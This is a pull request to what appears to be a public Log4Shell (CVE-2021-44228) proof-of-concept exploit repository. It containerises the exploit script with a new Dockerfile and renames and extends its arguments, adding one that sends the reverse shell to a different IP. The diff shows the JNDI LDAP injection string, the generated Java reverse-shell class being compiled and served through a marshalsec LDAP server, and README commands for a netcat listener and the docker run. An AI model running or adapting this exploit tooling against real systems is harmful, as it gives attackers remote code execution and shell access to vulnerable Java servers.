### PR TITLE
Dockerfile for poc.py script and new arguments

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 jdk1.8.0_20/
 Exploit.*
+.DS_Store

--- a/Dockerfile_poc
+++ b/Dockerfile_poc
@@ -1,19 +1,20 @@
 FROM python:3.9-bullseye
 
 ENV RSHELL_PORT="9001"
-ENV RSHELL_IP="127.0.0.1"
+ENV RSHELL_IP="localhost"
 
 EXPOSE 8000/tcp
 EXPOSE 1389/tcp
 
-RUN pip3 install colorama argparse
+RUN adduser --group poc --system --home /home/poc --shell /bin/bash
+USER poc
 
-COPY poc.py /root/poc.py
-COPY requirements.txt /root/requirements.txt
-COPY target /root/target
-COPY jdk1.8.0_20 /root/jdk1.8.0_20
+COPY poc.py /home/poc/poc.py
+COPY requirements.txt /home/poc/requirements.txt
+COPY target /home/poc/target
+COPY jdk1.8.0_20 /home/poc/jdk1.8.0_20
 
+WORKDIR /home/poc
+RUN pip3 install -r requirements.txt
 
-WORKDIR /root
-
-CMD ["python3", "poc.py", "--userip", "${RSHELL_IP}", "--webport", "8000", "--lport", "${RSHELL_PORT}"]
+CMD python3 poc.py --userip $RSHELL_IP --webport 8000 --lport $RSHELL_PORT

--- a/Dockerfile_poc
+++ b/Dockerfile_poc
@@ -1,7 +1,8 @@
-FROM python:3.9-bullseye
+FROM python:3.10.1-bullseye
 
 ENV RSHELL_PORT="9001"
-ENV RSHELL_IP="localhost"
+ENV RSHELL_IP="host.docker.internal"
+ENV WEB_IP="host.docker.internal"
 
 EXPOSE 8000/tcp
 EXPOSE 1389/tcp
@@ -17,4 +18,4 @@ COPY jdk1.8.0_20 /home/poc/jdk1.8.0_20
 WORKDIR /home/poc
 RUN pip3 install -r requirements.txt
 
-CMD python3 poc.py --userip $RSHELL_IP --webport 8000 --lport $RSHELL_PORT
+CMD python3 poc.py --webip $WEB_IP --webport 8000 --ncip $RSHELL_IP --ncport $RSHELL_PORT

--- a/Dockerfile_poc
+++ b/Dockerfile_poc
@@ -1,0 +1,19 @@
+FROM python:3.9-bullseye
+
+ENV RSHELL_PORT="9001"
+ENV RSHELL_IP="127.0.0.1"
+
+EXPOSE 8000/tcp
+EXPOSE 1389/tcp
+
+RUN pip3 install colorama argparse
+
+COPY poc.py /root/poc.py
+COPY requirements.txt /root/requirements.txt
+COPY target /root/target
+COPY jdk1.8.0_20 /root/jdk1.8.0_20
+
+
+WORKDIR /root
+
+CMD ["python3", "poc.py", "--userip", "${RSHELL_IP}", "--webport", "8000", "--lport", "${RSHELL_PORT}"]

--- a/README.md
+++ b/README.md
@@ -30,11 +30,6 @@ Proof-of-concept (POC)
 
 As a PoC we have created a python file that automates the process. 
 
-
-#### Requirements:
-```bash
-pip install -r requirements.txt
-```
 #### Usage:
 
 
@@ -43,9 +38,10 @@ pip install -r requirements.txt
 nc -lvnp 9001
 ```
 * Launch the exploit.<br>
-**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory.
+**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory of 'Dockerfile_poc'.
 ```py
-$ python3 poc.py --userip localhost --webport 8000 --lport 9001
+$ docker build -t log4j-poc -f Dockerfile_poc .
+$ docker run --rm -it -e WEB_IP="localhost" -e RSHELL_IP="localhost" -e RSHELL_PORT="9001" -p 127.0.0.1:8000:8000 -p 127.0.0.1:1389:1389 --name exploit log4j-poc
 
 [!] CVE: CVE-2021-44228
 [!] Github repo: https://github.com/kozmer/log4j-shell-poc
@@ -69,7 +65,7 @@ Our vulnerable application
 We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below:
 ```c
 1: docker build -t log4j-shell-poc .
-2: docker run --network host log4j-shell-poc
+2: docker run --rm -it -p 127.0.0.1:8080:8080 log4j-shell-poc
 ```
 Once it is running, you can access it on localhost:8080
 

--- a/poc.py
+++ b/poc.py
@@ -20,7 +20,7 @@ def listToString(s):
       sys.exit()
     
 
-def payload(userip , webport , lport):
+def payload(webip , webport , ncip, ncport):
 
   genExploit = (
       """
@@ -60,7 +60,7 @@ public class Exploit {
     s.close();
   }
 }
-  """) % (userip, lport)
+  """) % (ncip, ncport)
 
   # writing the exploit to Exploit.java file 
 
@@ -77,7 +77,7 @@ public class Exploit {
   print(Fore.GREEN + '[+] Setting up LDAP server\n')
 
   # create the LDAP server on new thread
-  t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
+  t1 = threading.Thread(target=createLdapServer, args=(webip,webport))
   t1.start()
 
   # start the web server
@@ -95,13 +95,13 @@ def checkJavaAvailible():
     sys.exit()
   
 
-def createLdapServer(userip, lport):
-  sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
+def createLdapServer(webip, ncport):
+  sendme = ("${jndi:ldap://%s:1389/a}") % (webip)
   print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
 
   subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
 
-  url = "http://{}:{}/#Exploit".format(userip, lport)
+  url = "http://{}:{}/#Exploit".format(webip, ncport)
   subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
                  "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
  
@@ -118,20 +118,21 @@ if __name__ == "__main__":
   try:
     parser = argparse.ArgumentParser(description='please enter the values ')
 
-    parser.add_argument('--userip', metavar='userip', type=str,
+    parser.add_argument('--webip', metavar='webip', type=str,
                         nargs='+', help='Enter IP for LDAPRefServer & Shell')
 
     parser.add_argument('--webport', metavar='webport', type=str,
                         nargs='+', help='listener port for HTTP port')
 
-    parser.add_argument('--lport', metavar='lport', type=str,
+    parser.add_argument('--ncip', metavar='ncip', type=str,
+                        nargs='+', help='Netcat IP')
+
+    parser.add_argument('--ncport', metavar='ncport', type=str,
                         nargs='+', help='Netcat Port')
 
     args = parser.parse_args()
 
-    #print(args.userip)
-
-    payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
+    payload(listToString(args.webip), listToString(args.webport), listToString(args.ncip), listToString(args.ncport))
 
   except KeyboardInterrupt:
     print(Fore.RED + "user interupted the program.")


### PR DESCRIPTION
I have done some useful modification:
- Dockerfile for running poc.py script under container, file named 'Dockerfile_poc'
- New argument --ncip for redirect reverse shell connection to a different IP 
- Renamed argument --lport to --ncport for matching naming scheme of --ncip
- Renamed argument --userip to --webip for matching naming scheme of --webport
- Modified REDME.md with new feature